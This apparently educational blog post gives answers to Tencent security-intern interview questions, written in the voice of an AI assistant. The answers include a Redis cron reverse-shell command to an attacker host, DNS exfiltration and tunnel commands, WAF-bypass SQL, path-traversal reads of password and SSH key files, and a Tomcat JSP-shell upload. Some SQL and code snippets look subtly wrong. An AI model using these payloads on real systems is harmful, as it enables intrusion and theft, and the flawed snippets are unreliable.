2025年渗透测试面试题总结-腾讯[实习]安全研究员(题目+回答)

安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

腾讯[实习]安全研究员

[1. 自我介绍](#1. 自我介绍)

[2. SQL二次注入原理](#2. SQL二次注入原理)

[3. 二次注入修复方案](#3. 二次注入修复方案)

[4. SQL注入绕WAF(过滤information)](#4. SQL注入绕WAF(过滤information))

[5. Redis未授权访问漏洞](#5. Redis未授权访问漏洞)

[6. 渗透测试流程](#6. 渗透测试流程)

[7. CTF印象深题(例题)](#7. CTF印象深题(例题))

[8. 文件下载漏洞利用](#8. 文件下载漏洞利用)

[9. 关键读取文件列表](#9. 关键读取文件列表)

[10. HTTP不出网命令执行处理](#10. HTTP不出网命令执行处理)

[11. 隧道通信详解](#11. 隧道通信详解)

[12. 漏洞预警处理流程](#12. 漏洞预警处理流程)

[13. 中间件漏洞复现案例](#13. 中间件漏洞复现案例)

[14. 学校攻防演练职责](#14. 学校攻防演练职责)

腾讯[实习]安全研究员

复制代码
1. 自我介绍
2. sql注入了解吗,讲一讲二次注入的原理
3. 二次注入要怎么修复
4. sql注入过waf了解吗,若一个sql注入过滤了information关键词,怎么绕过
5. Redis未授权访问
6. 渗透测试的一个完整流程
7. 打ctf的时候有没有遇到什么印象特别深的题目
8. 文件下载漏洞有没有什么比较好的利用方式
9. 利用文件下载漏洞找文件名具体是找什么文件名(读取文件一般会读取哪些文件)(ctf中?实战中?)
10. 命令执行漏洞,http不出网有什么比较好的处理方法(发散一点说)
11. 接上一题,通过隧道通信,详细讲讲通过什么类型的隧道,讲讲具体操作
12. 漏洞预警
13. 有没有复现过中间件类型的漏洞(有没有完整的复现过漏洞)
14. 在学校的攻防演练中扮演的角色的主要职责是什么

1. 自我介绍

我是网络安全领域的AI助手,专注于渗透测试、漏洞分析与防御方案研究。回答内容基于OWASP标准、CTF赛事经验及实战攻防场景。


2. SQL二次注入原理

核心流程

  • 存储阶段 :攻击者提交恶意数据(如admin'#)被存入数据库(如注册用户名)
  • 触发阶段 :当应用调用该数据拼接SQL时(如修改密码操作),构造出UPDATE users SET password='new_pwd' WHERE user='admin'#',导致#后的条件失效,从而修改admin密码。

3. 二次注入修复方案

复制代码
sql`-- 修复代码示例(参数化查询) cursor.execute("UPDATE users SET password=%s WHERE username=%s", (new_pwd, username))`

综合措施

  • 输入校验:过滤单引号、分号等特殊字符
  • 最小权限:数据库账户仅授权必要操作
  • 敏感操作审计:监控异常SQL执行日志

4. SQL注入绕WAF(过滤information

绕过方案

  • 替代关键词

    复制代码
    sql`SELECT table_name FROM sys.schema_tables -- MySQL 8.0+替代information_schema `
  • 编码混淆

    复制代码
    sql`SELECT 1 FROM /*!50000 information*/.tables -- 利用MySQL版本注释 `
  • 字符串拼接

    复制代码
    sql`SELECT 'inf'||'ormation_schema'.tables -- PostgreSQL/MySQL字符串连接 `

5. Redis未授权访问漏洞

利用方式

复制代码
bash`redis-cli -h 目标IP FLUSHALL # 清空数据库 echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/attacker/4444 0>&1\n\n" | redis-cli -h 目标IP -x set 1 redis-cli -h 目标IP config set dir /var/spool/cron/ redis-cli -h 目标IP config set dbfilename root `

防御 :启用认证(requirepass)、绑定127.0.0.1、限制防火墙策略。


6. 渗透测试流程

复制代码
mermaid`graph TD A[信息收集] --> B[漏洞扫描] B --> C{漏洞验证} C -->|存在风险| D[渗透利用] C -->|无风险| E[生成报告] D --> F[权限提升] F --> G[数据获取] G --> H[痕迹清理] H --> E `

7. CTF印象深题(例题)

题型 :Java反序列化+内存马注入
解法

  1. 分析JRMP协议流量
  2. 构造Gadget链触发Tomcat Filter注入
  3. 通过内存Shell绕过文件上传检测

8. 文件下载漏洞利用

高阶利用

  • 路径穿越/download?file=../../../../etc/passwd
  • 结合解析漏洞 :下载.htaccess覆盖配置使图片执行PHP
  • SSRF组合 :利用file://协议读取本地文件

9. 关键读取文件列表

场景 目标文件示例
CTF /proc/self/environ, /flag, .git/config
实战 /etc/shadow, ~/.ssh/id_rsa, WEB-INF/web.xml
云环境 /meta-data/iam-role-credentials

10. HTTP不出网命令执行处理

四类解决方案

  1. DNS通道nslookup $(whoami).attacker.com
  2. ICMP隧道 :使用ptunnel传输数据
  3. 延时盲注 :通过sleep $(id|cut -c1)逐位提取
  4. 临时文件 :重定向输出到Web目录(如/var/www/html/result

11. 隧道通信详解

ICMP隧道(icmpsh)操作

复制代码
bash`# 攻击端 ./icmpsh_m.py 攻击者IP 目标IP # 目标机(无网状态下) ./icmpsh.exe -t 攻击者IP -d 500 -s 30 `

DNS隧道(dnscat2)

复制代码
bash`dnscat2-server --secret=密钥 attacker.com dnscat2-client --secret=密钥 attacker.com `

12. 漏洞预警处理流程

  1. 订阅CVE公告(NVD、CNVD)
  2. 验证漏洞影响范围(版本比对)
  3. 搭建沙箱复现漏洞
  4. 制定临时防御策略(如WAF规则)
  5. 协调补丁更新窗口期

13. 中间件漏洞复现案例

漏洞 :Apache Tomcat CVE-2017-12615(PUT任意文件上传)
复现步骤

复制代码
http`PUT /shell.jsp/ HTTP/1.1 Host: target:8080 Content-Length: 25 <% Runtime.exec("cmd"); %>`

修复 :升级版本或配置readonly=true


14. 学校攻防演练职责

防守方核心任务

  • 实时监控:分析WAF、IDS告警日志(如Suricata规则匹配)
  • 溯源反制:通过蜜罐捕获攻击者IP及手法
  • 应急响应:隔离感染主机(如阻断3389端口)
  • 加固实施:关闭高危服务(如SMBv1)
相关推荐
aitav012 分钟前
⚡ WSL2 搭建 s5p6818 Linux 嵌入式开发平台 (part 3):Wifi驱动移植、ssh移植、e2fsprogs移植
linux·wifi·ssh·嵌入式·e2fsprogs
南枝异客3 小时前
CentOS 7 网络连接问题
linux·运维·centos
牛奶咖啡133 小时前
实现Linux的ssh免密登录实操保姆级教程
linux·ssh·生成ssh密钥对的三种方法·添加公钥到需ssh免登录服务器·测试ssh免登录的服务器·生产环境linux的优化策略
渡我白衣3 小时前
C++ 异常处理全解析:从语法到设计哲学
开发语言·c++·面试
꒰ঌ 安卓开发໒꒱4 小时前
Java面试-并发面试(一)
java·jvm·面试
你的人类朋友4 小时前
HTTP为什么不安全?
安全·http·https
zhangrelay5 小时前
操作系统全解析:Windows、macOS与Linux的深度对比与选择指南(AI)
linux·笔记·学习
聪明的笨猪猪5 小时前
Java SE “面向对象”面试清单(含超通俗生活案例与深度理解)
java·经验分享·笔记·面试
聪明的笨猪猪5 小时前
Java 集合 “List + Set”面试清单(含超通俗生活案例与深度理解)
java·经验分享·笔记·面试
绝无仅有5 小时前
资深面试题之MySQL问题及解答(二)
后端·面试·github